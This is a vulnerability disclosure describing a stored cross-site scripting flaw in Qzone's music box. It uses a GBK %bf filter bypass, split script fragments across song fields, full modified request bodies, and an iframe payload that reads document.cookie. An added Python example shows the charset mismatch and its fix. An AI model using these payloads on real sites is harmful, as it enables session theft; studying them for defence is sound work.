Filtered < and >? Bypass it. Filtered ( and )? Bypass it. Want to use /**/ to comment something out? Even * is filtered.
The problematic address is:

http://qzone-music.qq.com/fcg-bin/fcg_music_fav_getinfo.fcg?dirinfo=1&dirid=201&uin=QQnumber&p=0.887586027616635&inCharset=GB2312&outCharset=utf-32&hostUin=&notice=0&needNewCode=0&format=jsonp&platform=musicbox&jsonpCallback=jsonCallback

This address outputs the contents of the "I like" album in the Qzone music box of the given QQ number, including the singer, song name and song address of each track. Normally, < and > in the singer name, song name and song address are filtered, i.e. converted to &lt; and &gt;.

The bypass for this step is: %bf<script/%bf>

Principle: the server filters special characters in the data, but when it reads %bf it treats the byte pair %bf< as a single GBK character. The filter therefore sees the above content as: [GBK character]script/[GBK character]. When that content is later output to the page, it becomes <script/?> (where ? is an unrecognized, garbled character), so we have inserted a <script> tag.

-----------------------------------------------------------

With the method above we can write the following code: %bf<script/%bf>alert(1);%bf</script/%bf>

Unfortunately, after inserting this into the song title we found that ( and ) are escaped into the form &#xxxx;, so alert cannot be executed, and without parentheses the code cannot be executed either.

---------------------------------------------------------------

However, we control several output points. The output looks like this (songname, singername, url):

songname:"control point 1",singerid:0,singername:"control point 2",url:"control point 3"

That is, we can use comments to join the points, entering the following: songname:"aaaaaaa",singerid:0,singername:"%bf<script/%bf>/*",url:"*/;alert(1)//"

However, * is also filtered into &#xxxx;.
Continuing the test, we found that not only parentheses and asterisks but also =, +, % and basically every other symbol are filtered. Fortunately, [, ] and / are not filtered. In addition, we were surprised to find that the filtering rules for url differ from those for songname and singername: many symbols are not filtered in url. So:

songname:"aaaaaaa",singerid:0,singername:"%bf<script/%bf>[",url:"];alert(1)/*"

-----------------------------------------------------------------

The song above produces <script>[",url:"];alert(1)/*.... Then edit the next song and modify its songname to add </script>, closing the script tag:

songname:"%bf*//%bf</script/%bf>",singerid:0

The concrete exploitation process is written in the vulnerability proof.

Vulnerability proof:

Enter the "I like" directory in the Qzone music box.

1. First modify the first song: capture the packet and modify it. Packet URL: http://qzone-music.qq.com/cgi-bin/v5/cgi_music_modsong_new?g_tk=1232408522 In the first packet, modify the url and singer parameters:

formsender=1&out=2&from=1&source=103&uin=8639560&songid=4283798478&type=1&urlchanged=1&moodchanged=0&url=];alert(1);/*login&songtitle=aaa&singer=%bf<script/%bf>[&dirid=201&desc=&inCharset=GB2312&hostUin=8639560&notice=0&needNewCode=0&g_tk=1232408522&format=fs&platform=musicbox&outCharset=gb2312

2. Then modify the second song: capture the packet and modify it, same address as in step 1, this time modifying the songtitle parameter:

formsender=1 ... &songtitle=%bf*//%bf</script/%bf>&singer=%CE%D2%C3%C7%B5%C4%B0%AE&dirid=201&desc=&inCharset=GB2312&hostUin=8639560&notice=0&needNewCode=0&g_tk=1232408522&format=fs&platform=musicbox&outCharset=gb2312

3. The final effect is as follows:

4. Then use an iframe:

<iframe name="alert(document.cookie)" src="http://qzone-music.qq.com/fcg-bin/fcg_music_fav_getinfo.fcg?dirinfo=1&dirid=201&uin=QQnumber&format=jsonp&platform=musicbox&jsonpCallback=jsonCallback">
Solution:
Filter the symbols with a different function or method.
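The charset mismatch behind the %bf bypass (a byte-level filter that swallows %bf< as one GBK character while the output stage still renders the <) and the fix of decoding to text before escaping, as an added Python example written for this page; it is not code from the original report, and naive_gbk_filter is a hypothetical reconstruction of the behaviour the report describes, not Qzone's actual filter.

```python
import html

def naive_gbk_filter(raw: bytes) -> bytes:
    """Hypothetical filter modelled on the behaviour the report describes:
    it walks the raw bytes as GBK, treats any byte in 0x81..0xFE as the lead
    byte of a two-byte character and never inspects the trail byte, so a
    '<' or '>' placed right after a lead byte such as 0xBF slips through."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if 0x81 <= b <= 0xFE and i + 1 < len(raw):
            out += raw[i:i + 2]   # taken as one "GBK character", trail byte unchecked
            i += 2
        elif b == 0x3C:           # '<'
            out += b"&lt;"
            i += 1
        elif b == 0x3E:           # '>'
            out += b"&gt;"
            i += 1
        else:
            out.append(b)
            i += 1
    return bytes(out)

def render_naive(raw: bytes) -> str:
    """Filter on bytes, then decode leniently for output (the mismatch).
    The lone 0xBF is an invalid sequence and becomes U+FFFD, while the
    '<' that hid behind it reaches the page intact."""
    return naive_gbk_filter(raw).decode("gbk", errors="replace")

def render_fixed(raw: bytes) -> str:
    """Decode to text first, then escape the text: filter and output now
    see the same characters, so '<' can no longer hide behind a lead byte."""
    text = raw.decode("gbk", errors="replace")
    return html.escape(text, quote=True)

# Constructed input: the %bf<script/%bf> shape from the report, as raw bytes.
PAYLOAD = b"\xbf<script/\xbf>"

if __name__ == "__main__":
    print(repr(render_naive(PAYLOAD)))   # '\ufffd<script/\ufffd>' : tag survives
    print(repr(render_fixed(PAYLOAD)))   # '\ufffd&lt;script/\ufffd&gt;'
```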